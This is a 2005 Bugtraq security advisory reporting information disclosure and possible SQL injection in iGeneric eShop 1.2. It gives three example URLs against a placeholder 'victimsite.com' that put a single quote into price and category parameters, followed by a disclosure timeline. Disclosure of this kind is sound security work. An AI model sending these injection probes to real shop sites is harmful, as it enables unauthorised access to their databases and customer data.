[NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure & Possible SQL Injection

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure & Possible SQL Injection
From: "John Cobb" <johnc@xxxxxxxxxxx>
Date: Mon, 21 Feb 2005 20:45:17 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcUXcwbMDWspINdRQAylwsdTY23QQgA4y9vg

 
Hello All,

I have discovered multiple vulnerabilities in: iGeneric eShop 1.2

Authors Site: http://www.igeneric.co.uk

+-[Examples:]--------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 10/02/2005
Author(s) Informed on: 14/02/2005
Author(s) Response: None As Of Yet
Author(s) Fix: None As Of Yet


Regards

John Cobb

JohnC@xxxxxxxxxxx

http://www.nobytes.com

Prev by Date: SD Server 4.0.70 Directory Traversal Bug
Next by Date: Re: Windows Firewall Has A Backdoor
Previous by thread: SD Server 4.0.70 Directory Traversal Bug
Next by thread: The WebConnect 6.4.4 and 6.5 contains several vulnerabilities
Index(es):
- Date
- Thread